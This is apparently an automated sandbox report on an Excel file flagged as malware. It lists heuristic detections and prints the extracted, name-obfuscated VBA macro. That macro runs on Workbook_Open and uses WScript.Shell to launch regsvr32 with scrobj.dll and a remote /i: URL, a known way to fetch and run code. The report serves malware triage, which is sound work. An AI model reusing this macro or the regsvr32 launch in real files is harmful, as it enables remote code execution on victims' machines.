MALICIOUS
390
Risk Score
Heuristics 9
-
ClamAV: Xls.Malware.Valyria-10036093-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036093-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set CP = CreateObject("WScript.Shell") -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
CP.Run ("regsvr32 /sKzfFGDRbQuvwXuvELwEvGeUQUFkFcofYGwpBIsNSNUeDTArc /nGuyXBJDuNscbWscisoKFYtTCSkCAGthYYEvrPXVcKSUJdnLS /uKzfFGDRbQuvwXuvELwEvGeUQUFkFcofYGwpBIsNSNUeDTArc /i:https://the.earth.li/~sgtatham/putty/0.74/w64 scrobj.dll ChLrsPwELzUSVzTRbsQUsKSkRSPreAkYtSopXEduGRJOokaH") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set CP = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://the.earth.li/~sgtatham/putty/0.74/w64 In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15333 bytes |
SHA-256: 45e9e4d96a3739fd8315ca6cb48269cb1016f29e4dfb42dde04bff43c4f3bf47 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub f()
End Sub
Attribute VB_Name = "EstaPastaDeTrabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim ABLvGbRsdMLMGLXRDSzwzNAZdJZsKuzJ As Workbook, NfTMreosuBtwrwRFSSNwoCcFNRPEdAswZvuKAfucMRPIUXLcNFsGwBowdoZ As Workbook, NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO As Workbook, IJoFNEAPntTfNkfRhkIhCAoQIeULrvQhXutowHnvCfSdsOBoJQRShtBisCX As Workbook
Dim Ecc As Workbook, AvMzLpGMEXOALBJfKKAAHZffAJFdhVMBZDFnVwEeyJEw As Workbook, itGhbnTcQzfKbMBLCDiLVBkKiAnIprdLY As Workbook, VD As Workbook
Dim GswenSRJUKRBCatzeIsUWMXHnHawkreiMMAPHUKpHBKDhWkkfItDBPQU As Integer, aDUQaySd As Integer, NOIPVbRMfJYHKXfuJSonuKNTWMJLXfGSWEwEBBUIhsbIUF As Integer, JfrvPAOArKLwdnroLcEMocQzhyNpznbXhsMuNFAnHuAzAPBshNCXVYpHnWesMFaaJ As Integer
Dim IKzcGfRcSZTcBEDIYUQezsBRdvbktMrNJEnezkBARASfMDYhTySZK As Range, ADwEQdIyw As Range, iuSnLfAfrWWRaSrRWDUWRapHQeWcTrOCQHLGztISydfTILsSQLfCwZch As Range
Dim IieYMhHrYiay As Range, TMBYNRUCAczuQNAbeABQcOheAyibXzUwAJYDCpiyVSSHiytiyKVU As Range, sTrscCRCpdGEIVKzMnRQzzAHGsYA As Range, yiDnnORWhyIfHoRIHGfaWdXQrZZyBWkiZzZBrOsvOFbiiaeriLu As Range, PThTYkQPGvbtrDsLGVzZzZBIcTdbdfvXrLQtFLPtW As Range, XinRsBQpDGdYnVCaBiNpWJYRQDeZuBCEiDJMteGIvrUcDuYYEhLtdsOkXDMrp As Range
Dim MFtW As Variant, bdefYXAXGvWHvuTaTNwF As Variant
Dim RSFU As String
Dim KYHaXtRCPoVJzWKRUfhnWaYaRV, URISPkVzvtGfpyDnvSChey As Long
Dim WTutVfMvXdRRZdRJKchnyuYMYJoUDdbZyncTiHkpWYPfpTrP As Variant
WTutVfMvXdRRZdRJKchnyuYMYJoUDdbZyncTiHkpWYPfpTrP = Array("TOIRRsCGVhKKYhKszfsKRIXBXtJRbidZRKf #", "UbAdHhvRAFVyLPAeFskweLWBMQGNRArnMfVeVT", "PIThNBfQTnDCYnDVakCXiTWeWWVMHreZ", "TOIRRsCGVhKKYhKszfsKRIXBXtJRbidZRKf SMFPQvyDVhIIYhIurfuIQFXyXuHPbhcZQIeNnkszTXFvzNKE", "TOIRRsCGVhKKYhKszfsKRIXBXtJRbidZRKf OGSiLtfPSpAzXpzVakyXkSWeVWUKFweZkWhHBPEJQVntJHao", "KzfFGDRbQuvwXuvELwEvGeUQUFkFcofYGwpBIsNSNUeDTArc GuyXBJDuNscbWscisoKFYtTCSkCAGthYYEvrPXVcKSUJdnLS", "ChLrsPwELzUSVzTRbsQUsKSkRSPreAkYtSopXEduGRJOokaH")
Dim WTvIRPeZCQpdUOdtQTYFJyNaODtJENFBQXBWTBAdCVCFFLBf As Long, pyMzXUYuyOQtTidakSEciIzooAzABLCKJKeCuXssMnzCpJvh As Long
Dim VhNS As String, MuPYrKRWMIXwyARiPtFFzKBpFFc As String
For aDUQaySd = 1 To KYHaXtRCPoVJzWKRUfhnWaYaRV
VhNS = NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & aDUQaySd).Value
MuPYrKRWMIXwyARiPtFFzKBpFFc = NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("TOIRRsBGVhK" & aDUQaySd).Value
Select Case True
Case VhNS = "ODJbieNSvMZYSXeuYQKdpaPUsoEcrIseodtHeXkYhhosDEQi:": NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & aDUQaySd & ":TOIRRsBGVhK" & aDUQaySd).Font.Bold = True
Case InStr(1, VhNS, "UbAdHhvRAFVyLPAeFskweLWBMQGNRArnMfVeVT: ")
NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & aDUQaySd & ":TGQRtpZEZzpBkYVNaiENyXwAcwRvA" & aDUQaySd).Interior.ColorIndex = 15
NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & aDUQaySd).Font.Bold = True
Case InStr(1, MuPYrKRWMIXwyARiPtFFzKBpFFc, "WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX"): NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("TOIRRsBGVhK" & aDUQaySd & ":TOIRRsBGVhK" & (aDUQaySd + 2)).Interior.ColorIndex = 37
Case InStr(1, MuPYrKRWMIXwyARiPtFFzKBpFFc, "TOIRRsBGVhK"): NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("TOIRRsBGVhK" & aDUQaySd & ":TOIRRsBGVhK" & (aDUQaySd + 2)).Interior.ColorIndex = 3
Case InStr(1, MuPYrKRWMIXwyARiPtFFzKBpFFc, "ZfeeaWKFdaMfnFkVKaDLwURCeyePyOEUCDOPbVQIhBkzdXVENHtUznOfnHZISVhnCSJ"): NGYVHWQrJWZQtYdCKJZPWnYznpcdVPbCzTWcO.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("TOIRRsBGVhK" & aDUQaySd & ":TOIRRsBGVhK" & (aDUQaySd + 2)).Interior.Color = RGB(50, 205, 50)
End Select
Next aDUQaySd
Application.DisplayAlerts = False
Dim FeWHwwOGTXpHYQa As PivotItem
With Application.FileDialog(msoFileDialogFilePicker)
.AllowMultiSelect = False
'sTrscCRCpdGEIVKzMnRQzzAHGsYA edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf aDUQaySd eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV
.Filters.Add "Excel Files", "*.epTpBAChMUykWGbDHWubdRMhhNpwNSOSn; *.tOnaGFszITZCWYchZVS; *.RJyysrITPVQUXkbUkXMDFHbTHQizQURICfVLwCOU; *.JoQRMKwMFRHPVscPtUybfpcNpGnSHPIvYvRsAYDPoCGIVNLefJadyzFAvcHfr; *.WTvI", 1
Set CP = CreateObject("WScript.Shell")
CP.Run ("regsvr32 /sKzfFGDRbQuvwXuvELwEvGeUQUFkFcofYGwpBIsNSNUeDTArc /nGuyXBJDuNscbWscisoKFYtTCSkCAGthYYEvrPXVcKSUJdnLS /uKzfFGDRbQuvwXuvELwEvGeUQUFkFcofYGwpBIsNSNUeDTArc /i:https://the.earth.li/~sgtatham/putty/0.74/w64 scrobj.dll ChLrsPwELzUSVzTRbsQUsKSkRSPreAkYtSopXEduGRJOokaH")
.Show
'UbAdHhvRAFVyLPAeFskweLWBMQGNRArnMfVeVT WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX /nGuyXBJDuNscbWscisoKFYtTCSkCAGthYYEvrPXVcKSUJdnLS edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf
End With
If InStr(fullpath, ".RJyysrITPVQUXkbUkXMDFHbTHQizQURICfVLwCOU") = 0 Then
Exit Sub
End If
Set ws = Workbooks.Open(fullpath)
Set wb = Workbooks.Add
ws.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).UsedRange.Copy Destination:=wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & Rows.yWKyvawMwbPYUAkOGYfpPhnrBsfvXFICVLwdPyGX).End(xlUp)
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("PwkdwCCWDayfMiiWvAFcpetAevkGvKHFPrZssBRaKoihXI").Value = "Status"
lRow = wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Cells(Rows.yWKyvawMwbPYUAkOGYfpPhnrBsfvXFICVLwdPyGX, 1).End(xlUp).Row
For UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC = 2 To lRow
If wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("H" & UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC).Value = 0 And wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV(1).Range("I" & UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC).Value = 0 Then
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC" & UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC).Value = "ZfeeaWKFdaMfnFkVKaDLwURCeyePyOEUCDOPbVQIhBkzdXVENHtUznOfnHZISVhnCSJ"
Else
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC" & UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC).Value = "ZfeeaWKFdaMfnFkVKaDLwURCeyePyOEUCDOPbVQIhBkzdXVENHtUznOfnHZISVhnCSJ"
End If
Next UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJzUGkkoRyULPDQauODhAILZVGkZoGyzGArC
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("AsrdFSMDiDBeSGIWhIJeKBOTdDroaFidkdtNTnrGCFJvufCuQhiMziXZIC:PwkdwCCWDayfMiiWvAFcpetAevkGvKHFPrZssBRaKoihXI").AutoFilter _
Field:=4, _
Criteria1:=Array("EN", "EN/KuvdruUfNDOezYJWFkHNLwkVdKvCiJfyWvfhDOnkXNKDtBv", "FF", "FF/KuvdruUfNDOezYJWFkHNLwkVdKvCiJfyWvfhDOnkXNKDtBv", "FnodAconXafefPhWSVIzkrYtddote", "FnodAconXafefPhWSVIzkrYtddote/KuvdruUfNDOezYJWFkHNLwkVdKvCiJfyWvfhDOnkXNKDtBv"), _
Operator:=xlFilterValues
'PIThNBfQTnDCYnDVakCXiTWeWWVMHreZ
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("AsrdFSMDiDBeSGIWhIJeKBOTdDroaFidkdtNTnrGCFJvufCuQhiMziXZIC:PwkdwCCWDayfMiiWvAFcpetAevkGvKHFPrZssBRaKoihXI").AutoFilter _
Field:=5, _
Criteria1:=Array("1", "2", "3", "4", "5", "6", "7"), _
Operator:=xlFilterValues
'UbAdHhvRAFVyLPAeFskweLWBMQGNRArnMfVeVT
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Range("AsrdFSMDiDBeSGIWhIJeKBOTdDroaFidkdtNTnrGCFJvufCuQhiMziXZIC:PwkdwCCWDayfMiiWvAFcpetAevkGvKHFPrZssBRaKoihXI").AutoFilter _
Field:=7, _
Criteria1:=Array("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX", "TOIRRsBGVhK", "ZfeeaWKFdaMfnFkVKaDLwURCeyePyOEUCDOPbVQIhBkzdXVENHtUznOfnHZISVhnCSJ"), _
Operator:=xlFilterValues
Worksheets("YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV").Cells(1, 1).Select
eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV.Add
wb.PivotCaches.Create(SourceType:=xlDatabase, SourceData:= _
"YKaUhKJKZCDTfYaXEeoFXdpINHHohYEWNEczGrKYtyLfKipbMeNVsXoV!R1C1:R" & lRow & "edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf", Version:=xlPivotTableVersion15).CreatePivotTable _
TableDestination:="EiQrsGavPpGJPdQyvyMX!R3C1", TableName:="PivotTable1", DefaultVersion _
:=xlPivotTableVersion15
eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Select
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).AddFields _
ColumnFields:="WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX", _
RowFields:=Array("UbAdHhvRAFVyLPAeFskweLWBMQGNRArnMfVeVT", "acfSopHfkKHuRrfVtPwGMwAiVwGTuGnofPaiDAfvsFpoiCGkMiDAVosQHX", "acfSopHfkKHuRrfVtPwGMwAiVwGTuGnofPaiDAfvsFpoiCGkMiDAVosQHX", "acfSopHfkKHuRrfVtPwGMwAiVwGTuGnofPaiDAfvsFpoiCGkMiDAVosQHX", "acfSopHfkKHuRrfVtPwGMwAiVwGTuGnofPaiDAfvsFpoiCGkMiDAVosQHX")
With wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).PivotFields("rzycKIfMtaRdEtfXArKQiGErdWykWDLWraCDaHTOOYfIMYHa")
.Orientation = xlDataField
.Name = "yWKyvawMwbPYUAkOGYfpPhnrBsfvXFICVLwdPyGX"
.Function = xlCount
End With
With wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).PivotFields("rzycKIfMtaRdEtfXArKQiGErdWykWDLWraCDaHTOOYfIMYHa")
.Orientation = xlDataField
.Name = "ODJbieNSv"
.NumberFormat = "ODJbieNSv"
.Function = xlCount
.Calculation = xlPercentOfRow
End With
With wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).PivotFields("UbAdHhvRAFVyLPAeFskweLWBMQGNRArnMfVeVT")
.ykvzXNudwPBcASwCR("pyMz").Visible = False
.ykvzXNudwPBcASwCR("pyMz").Visible = False
.ykvzXNudwPBcASwCR("pyMz").Visible = False
.ykvzXNudwPBcASwCR("pyMz").Visible = False
.ykvzXNudwPBcASwCR("(pyMz)").Visible = False
End With
With wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).PivotFields("Battalion")
.ykvzXNudwPBcASwCR("pyMz").Visible = False
.ykvzXNudwPBcASwCR("(pyMz)").Visible = False
End With
For Each FeWHwwOGTXpHYQa In wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).PivotFields("Rank").ykvzXNudwPBcASwCR
On Error Resume Next
FeWHwwOGTXpHYQa.Visible = False
Next FeWHwwOGTXpHYQa
With wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).PivotFields("Rank")
.ykvzXNudwPBcASwCR("BX").Visible = True
.ykvzXNudwPBcASwCR("BX/BX").Visible = True
.ykvzXNudwPBcASwCR("BX").Visible = True
.ykvzXNudwPBcASwCR("BX/BX").Visible = True
.ykvzXNudwPBcASwCR("BX").Visible = True
.ykvzXNudwPBcASwCR("BX/BX").Visible = True
.ykvzXNudwPBcASwCR("(BX)").Visible = False
End With
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).PivotFields("Battalion").ShowDetail = False
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").PivotTables(1).RefreshTable
For j = 7 To 13
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & j).Value = "Battalion " & wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & j).Value
Debug.Print (j)
Next j
For k = 6 To 22 Step 8
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & k).Value = "UbAdHhvRAFVyLPAeFskweLWBMQGNRArnMfVeVT " & wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & k).Value
Next k
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf").Value = "yWKyvawMwbPYUAkOGYfpPhnrBsfvXFICVLwdPyGX"
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf").Value = "%"
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf").EntireRow.Hidden = True
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX:edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf").Columns.AutoFit
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Columns("edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf").Hidden = True
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf:edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf").Interior.Color = vbRed
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf:edbeVhusSDshHPLVsoCZOObaeYbUBQabsGIZTIuATcMcIf").Interior.ColorIndex = 22
For m = 7 To 23 Step 8
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & m & ":F" & m + 6).Interior.Color = vbYellow
wb.eJGQFDtTFXIAzkFSYNfnSyuhaQaFrEpHayinLCkETZEKkVcWZDGWtYV("EiQrsGavPpGJPdQyvyMX").Range("WUtBVhOsXdSSZdSLMdhyBtYNYLtVGebZBydUiJknX" & m - 1 & ":F" & m - 1).Interior.ColorIndex = 15
Next m
End Sub
Attribute VB_Name = "Planilha1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 52224 bytes |
SHA-256: 01de3ba5cb8ea7a07c05a43d95b726410101a43df9877131129d99beac27fff8 |
|||
|
Detection
ClamAV:
Xls.Malware.Valyria-10036093-0
Obfuscation or payload:
likely
378 of 615 identifiers look randomly generated (e.g. '_B_var_UkhdfMdNoDcfasKVXNEsMZHYeRhLnMdNJ') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.